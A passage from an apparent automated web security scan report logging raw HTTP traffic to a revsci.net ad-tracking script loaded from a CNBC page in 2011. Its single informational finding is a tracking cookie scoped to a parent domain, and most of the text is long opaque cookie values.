GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_FV7D="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9RC0SyMoveM9OR5om4StALLEl9sEMKhlp1SF6IV+6n10UiflLT2U8DIkhMqupLTVcemT1DUjfH8rpbnY2VOe9PIcfFRS2/2RbKiEJ0fCrYL8Pw15FsYgog4VJ9O6R8LOO2/nvqTeTstI4ek8lvynXNW7StQ8+JpJmowe+1kYAki8NfIMNPezUwsBAf1qt5nxUMUFeGt4ebqNOgrgzghhmeLrICn1UxVO5gAdVArU6GxK/s0bsjeekuDZUCTNW2lMbQ6Oad7+8gJCLQPEBQuJqlBcPZ+VhPcADvhumHMjJuxwmLltZ8c0fldkOaX4EE/Dq1Udpm4fXRSKWgytgQ3OdArGF71I4krLNKibu8pdh27IzpMdj+hEmVI87cYAvD3CjwDtmcpiBhwijpYFZRsiRSKjIWsriwhQEA35fJcJ+VBwWoNWXVbjUoN19JnzDIiZtzClggm92AL7KjyZhXAU7OF1CcwBwEsmtxCu7v1sGhtoQ8TewInjV9GpJyYvF/CjGxl36Orz+YVYiRHSaU6mOJRl7a06H8AK89o7C/lG+ogj26DCWD27cUSdmSDSXaAYJmhYnTzDbawcTTL3uu/dhbsekrmSHHa8av5N7wygmiLfvq6dpb4b1oD1Iq7HsI1TbFicRvOFqyAVTE9L4lNg9yVMExHGkUvNkyCkV+OlHHeBtKL47PNxSMgWAZ6C4UaNYr1O7tsmWZluy32LVBB7noX6WJGr03f15kcbxUC4HgjHPbM79P8M0yIrTZhXF32a9xpEbpIHmC7S0abqrqLueLp+7v7Q7VnquftHiBbKWCqeB+8972DgYPqtHt8kh4b+GIUtn8lNyinom/XvyNddVq4M9q1MdbIMk4vjaJEVFCw81H0THG312CnYuOo+AGBve1ycEJziTZGcyjiK21XpVRrNHLJWzqVhmQdjvYspOpmza7Kkrx7/1AHowLvBBkVycYt/jBPjN1bW9tlzvZbgelf6bvP2lN5C0lfzOAXfvoD3AMium5icx9oOphiH3SQXpJFl6zznMnaYDNUWi6ov+NutNlXRePfOacDfxX1uzENLGNB+DdUQq3ZiTs9vGGsEMjhiz6FUlJ71g1j+pNnF2C1nUK+wsANZX6ZQL4eo0qj95zZs860BN4MYRaIN6spDWj4+RCYmQ/qVp4bCI7G/mEKtxTCoP7jg5eTd2En/0xUXWv9epc2v/t3HxFwJ+/HRPbqBRrOw5Tmv+1ryCEMy7GTOVUK4Tm1tnMSsuWc09qLt6bfXjYQjamBQIFob5Dz3hXCuiO3PqIVv3gmKr41mL2k1mv4XiRJlv2ltV2iU5i1ayVZtt1mY="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/RJ/0QxWQt7qn94EC+Qxu7A2AHtZzJRHgcWvhF/5C6yfUn7k+WYUX3JADZzv6lilMVzhkfDNWVPxbs35sa93GZ2l+JxSAjTR9xeDAnMdWCuBLBRBWP2oyfWUBCJro/6eyCdOYOzT0mgaZ5w9FKkQUuABPCqaRBdn3VjZCsBqj8wBhQg0puaNn9uTTR8HybUxknTTZftqY6+4glX7amG/aPcdYqMlvKt5QYN53cxoNvSmPMH9JUOXdn8UovXP+TWEeFhGO/zYV0JuamdY8XA5WtJJbNkD7paMqslZqZ8puM3/1lhto2YwAsf9RSwLKUdtL9OmI3FJHS+Q0mWEvYsMUerKzT6/WoPsetzTImzS44ER6K85l0SCEXU25NS1dYSpVWpN91lcFhe/VdYmnQUn1VHwk+x3DqvS04ldjv012oBfnq6HIVzCry2lQcnIzr4u7iSaYlb93YINjHYtkLkB+1X09Dcbu9KxSa/goLxHfth5ZtoFL2kQEUZaCxqBX6ENJCg0EC6dS/LIU4CK5P9gPcNRmMhQIjxI69qr+9l7qT5Q/R3cfKUwYB2aGeON0X5x4dO4pgc9rT2ERMnyTq88rf9S3VqcWbwo4Hsx6eFmxCUC71suL45wbOsFIyoKBE/8VPJQ4v5zR8IqAUjqbrZfCA9M00Os+6GddAnFRny2zZUaXN8Z85wid6MW2E1C3TsUC7XCGQ19GfeSnOw7F4PmhaxtesXDEwF9l3F2ucs2/8uac9sbfIjZWR+8DTuVWnYJ8W1PMjBrL0v6+jLW2ghDpcoukX9RVqMXd+y5djnhq3+lBoWsQ5DCF9zjom78vSR0ryqw0Zf34JytsCTbsmD8D2hfTDtkiMNu/wQtKiKfMWgM3Du2pA6s1xl63lOviGo7qx5ELFL/G72RSObK/EmjV6g5L6Xn8jMa4C4NHlHkE7CUy7PmbwYue/iRiPmR6S1ELt/+xEp+0Ufax03GSmLvQHxh1xC3yrW9+Gar/mgz88GEws5Yzj7NbIhHXZg6ddGRMrf2XPHzwi7Dib6ZAHkFcWoihke0/EwE9TuzL5Ms6JHixooTRPi4BAc8lAs2xVidVGM5jGYEdzIQmExxeaHzWUnTDGJ6392tnMeOXnDv/5aoPp8MZIBCxKWEmTAt7Qoo4AqbmqcqeBtRvHoTkBc5pxB60Fz51ijd11MAewVI1KrKiw2fwFjIZ8oKbWqNbaUV/UuTlsrFGlgk22MVQ+rtNWzQaGjvdafLmWJnoN1IaQy/3v+6ByWwHckLQMjoPzQ7SpkEvN8MEbDMSbMdZDm4lNRIj8ZZZa4z2XeC7r8A7Aftb98UltuP3g9KdCS4fvz1VdpOnx+YaehMbksLjjc1eC74wud1pXnHTgeE9E/B5N5tK+StSu9EqgSsFfg7wnHsS5lN7ANxVfkz54qye6zUVRR4m7t4geTfYLhj/eSAp+WvFLjHMFGSCFxGyYU//VdIqOA8pBfLg9dTI9jogEeZ4uTS+cKo/ZucniRbvg2Tl2+0cTdC5wG20Z5NOyjyVWbUVwQoLmMikPwXgOjq62oFWHgZ7xHUtBPxI3OQMeLMWFrT7lDwxQktrDOVXOF2uFikAuyFKV7XFR5nkpbA62ODQFhZM0R2metesGD/azyVVocm/TzDgPATAGZkB8heLGubBZDsxcgdUr4sZJ6ElK12rvDB5fINxPTQAJwjcza78rBtfeaa1M1GJ+TcBuVm9CVVKufF7rDHL15JnB5sJMJIX5TNaf"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDwdmDq/nU81qU4zkObBUGuxDLeZIp/ZdGtgeDB7qFfWKxXPsLU7uupC/xn4Q==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIwrzqhtzkLb98whI1TyAiX4VXsMfxBwvwOTN3uNPwEJsPabBxQwHPp5/46LiCCA90/UyINB+lOenc2oXZx7bfxHZuTwOyjdiRgJsP1sXbC6eUwGWzLguW6SsMTBCG1D23QVRFUKOWM85CnTNYMCNXq3or7XEg8u2vvx0Y2vYif8fLD6jUtG/lMREU8yW7iI0DLsTrIFCkrm1kpy6i0cLlXjjhFLBrIbl2lJ/5FpXMpx8c0GKZrUAr7cCcVeLNbbQuRNOdLX2iFZDeIEyjdOSph5SNuEaU8qI8jPKp1c+1oFzm2RW+nTi7lTLQCS9QS5To51qJ+p39UCrWLj3B0M2CF0kB1krJQf+cRsNXnc5UwNIYROh1WMCYBqLdNHvxCYMTtXa1J8nLfpm0AIgPmN/9qTBoFg==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:59:22 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:59:22 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.155. http://pix04.revsci.net/I10985/b3/0/3/1008211/434601309.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/434601309.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLAjTX17HF2gQ4O3XYcv0liDtqNncA2iFgL2JciE4z/2iaPmPX0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zRzZlP3ivfC9uJamaWvpbVB03OAqYO3nwIMN4A0EWPi0I76xpm8QBpbXOY7VjkzlzOETVPxHAI3DbYZkryrWC3bnZ7rH2dGmBeaueJuJAxniY4JFGxGrGBKxNU+Z1EdU+cEVjhrWtS1s351oN25nSmUGacCmXS4lpoEKnh/FrSF71S0ZbH4+81ohkie50df67vgKKPwqlTXFuH2GNVRLlPwTXR5/L2uXjDq+XABH4kjxxNhO2NdZjfx1E7hsDhQX7cFCfaGYYFkRv5/uPBlfOXdHxYl9LYtCCaVvHoqZBPd1YOpz4fIYhTVpAizX/w/PY+bwcyN2qrgxmZlp5NYJVFWT8rTknwCoRLG7vfKAzA/QqqCje2IdWrt2+E4htplc1oKKHKkXaqqe7he1zAEIrX5zxkD+HIy/V1gctWO51L+ADs20x91UBXCmoOkk4BgR9/XbtHI9IMwoE0eq6XV8jrb6iYexF2YIWglMT+Nw+rLYOPUYbtq0aW9N5dgN9GlQ4NhU23njUr4ecF1Uzc9YEzgAFrpqwNUiVaC0HaVpq8CPI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:10:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/434601309.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252F%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; rtc_622X=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; rsiPus_b8FU="MLsXtSUNJjhvJpE4W8XcxPALFPJgPeDE7Ff6CLs1Rb8Vycmn5M9o/hpep6F9WP6iKbjeS1EvCK92NbndW2MLdaJpq0puezRQyGE/19AVaWSIMLvpTFv9DuubBt8HnJrcZLqq2sSwsQJOUcj2UGm8VSkIxV9xfIE781mcvTCJUd7Cx5HEpou7PRrL1oiO/ClfFrxeIFAF8LTaDnKFm0l75mmKPzgAytDxMo9OYeYOF8wT52fNFPDxFQ/xg0hs9+bacWMNH3d/vcaZVg3Ws0SHSRdB/e7gFXsVvC19Rl8Dc6NqdLi8gPC7cPEBwWNrlAcZR+Xh/sIHvv3DS/BInFTIuqtzdA6WWtAOaX5mQsjuNbnF9rcSOabflWXvtxYIfRWKvDMmO7yssYAAXLYsFrGidhNYxbiAvrrHcKDONQDwHtq51BqMFGXJ2K0pchWpIGU1mg451hYDsDNCb+MzSTa2I3IzJmoAxQ11FFdcsYDTaLnGElHubVQ+fkK3wh/7YcrgdWf1QcRj3tgWdeqIiSEQmiTarNTGWqkEwH8eex3b+lzReSJ+1BpZ1tObNS97EYmd7NBhr/NYn2YPwW4z3RwdgTsHncmtttDB4WjLJ3UiYxHIMa0WtYJwy0QHy7MfouoNj35yHiovVa3ePlwXrxm+2+MufHTGCj5U+rePYQrysaP1GH14+k3do/H7U2Ev+x/Dq/EPP3dnVNRTwCkC1YEvxuE6L94lN0nIjuQadceHBVQD0UlegLanaWP7z1LfYU+rS2u62/9ZEdET6idOD8im7C0ry9XUvJWm5u5ZFFmINi0cnKTEtZayepMDn2N/25kegpWTNmschXbiB7KWCqeZu6972DgZMcjfcDn3nYBJJzhk9AHY8ITLQhrSM99Vq4M9q1MdbIBqMReNDsXgHUiSMoXE+8GmuVPJdC+22IOCg60xf5qIrqgFbFHFJ9/XWYhCTGWwuRhW3Karpbup1QnAOOATnlxsBA5MaRzWLkB0CDf/hsPEtV/aWkYqz9vGsN8JDYHLsZkRq4FiPnfvoB18B/WqFf7/wExyJ3QY8gpLtcnlNQDfYWPkvb0df2BDf3XzMVTSHP/0sfvpBxC2GsrGtPcbmv